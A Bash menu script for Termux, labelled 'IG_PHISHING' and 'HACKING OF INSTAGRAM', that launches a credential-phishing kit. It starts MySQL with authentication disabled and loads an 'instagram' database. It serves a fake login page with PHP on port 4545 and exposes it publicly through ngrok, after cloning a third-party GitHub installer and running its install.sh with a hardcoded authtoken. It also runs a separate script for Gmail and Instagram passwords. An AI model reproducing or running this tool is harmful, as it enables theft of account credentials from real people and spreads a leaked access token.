#! data/data/com.termux/files/usr/bin/bash
clear
#variables
                red='\033[1;31m'
                green='\033[1;32m'
                yellow='\033[1;33m'
                blue='\033[1;34m'
                magenta='\033[1;35m'
                cyan='\033[1;36m'
                reset='\033[0m'	                     
banner() {
printf $magenta
echo      "
 ░▀█▀░█▀▀░░░░░█▀█░█░█░▀█▀░█▀▀░█░█░▀█▀░█▀█░█▀▀
 ░░█░░█░█░░░░░█▀▀░█▀█░░█░░▀▀█░█▀█░░█░░█░█░█░█
 ░▀▀▀░▀▀▀░▀▀▀░▀░░░▀░▀░▀▀▀░▀▀▀░▀░▀░▀▀▀░▀░▀░▀▀▀"
echo
printf $reset
echo -e   "\e[1;36m  AUTHOR :\033[1;31m   VeNOM24"
echo -e   "\e[1;36m  TOOL   :\033[1;31m   IG_PHISHING"
echo -e   "\e[1;36m  VERSION:\033[1;31m   1.0"

echo -e "\e[1;35m =============================================
\033[1;35m ============HACKING=OF=INSTAGRAM============="
echo ""

echo -e "\033[1;36m  [\033[0;m01\033[1;36m]\033[1;31m SERVER    MYSQLD\033[1;36m  PUERTO 3036"
echo -e "\033[1;36m  [\033[0;m02\033[1;36m]\033[1;31m INSTAGRAM SETUP\033[1;36m   DATABASE-IG"
echo -e "\033[1;36m  [\033[0;m03\033[1;36m]\033[1;31m SCANNERS  PORTS\033[1;36m   NMAP"
echo -e "\033[1;36m  [\033[0;m04\033[1;36m]\033[1;31m IG_LOGIN  L-HOST\033[1;36m  PUERTO 4545"
echo -e "\033[1;36m  [\033[0;m05\033[1;36m]\033[1;31m IG_LOGIN  NGROK\033[1;36m   PUERTO 4545"
echo -e "\033[1;36m  [\033[0;m06\033[1;36m]\033[1;31m GMAIL     PASSWD  \033[1;36mINSTAGRAM"
echo -e "\033[1;36m  [\033[0;m00\033[1;36m]\033[1;31m EXIT"    
echo
}

err() {                                              echo -e " \033[1;31m Error opcion invaalida"         
seleccion                                           
}
echo
seleccion(){
cd ~/IG_phishing	
#echo -e "\e[1;36m"                                  
echo -e -n "\e[1;35m  IG_PHISHING >> ";
printf $reset
read OPCION;

case $OPCION in

01)                 
mysqld --skip-grant-tables --general-log &
 ;;	

02)
	if [ -e $PREFIX/bin/dump.sql ]
then
echo -e "\e[1;33m LA DATABASE-IG YA ESTA CREADA"
sleep 1.5
clear
banner
seleccion


else
cd ~/IG_phishing
cp -r dump.sql $PREFIX/bin
cd $PREFIX/bin
mariadb -u root -e "create database instagram"
mariadb -u root instagram < dump.sql
echo -e "\e[1;36m La DATABASE INSTAGRAM SE CREO CON EXITO" 
sleep 1.5
clear
banner
seleccion
	fi
;;

03)
nmap 127.0.0.1
sleep 3.0
clear
banner
seleccion


;;

04) 
	php -S localhost:4545
	;;

05)
	#Verificando si existe ngrok

if [ -e $PREFIX/bin/ngrok ]
then
echo -e "\e[1;33m  ngrok ya esta  instalado"         
sleep 1.5
echo -e "\e[1;35m  iniciando el puerto 4545"
sleep 1.5
ngrok http 4545
	echo
        exit
else
git clone https://github.com/venom-24/Tunel-ngrok.git
cd Tunel-ngrok;ls
chmod +x *;ls
bash install.sh
sleep 1.5
ngrok authtoken 367ZHIA7EvqsnuhjDbWbizSX9Xb_5ipZyd3zSnd5Kows8FNKb

ngrok http 4545
fi
;;
06)

	cd ~/IG_phishing
	bash 24.sh

	;;

00)
	exit
	;;
*) err;;	
esac    
}       
banner
seleccion
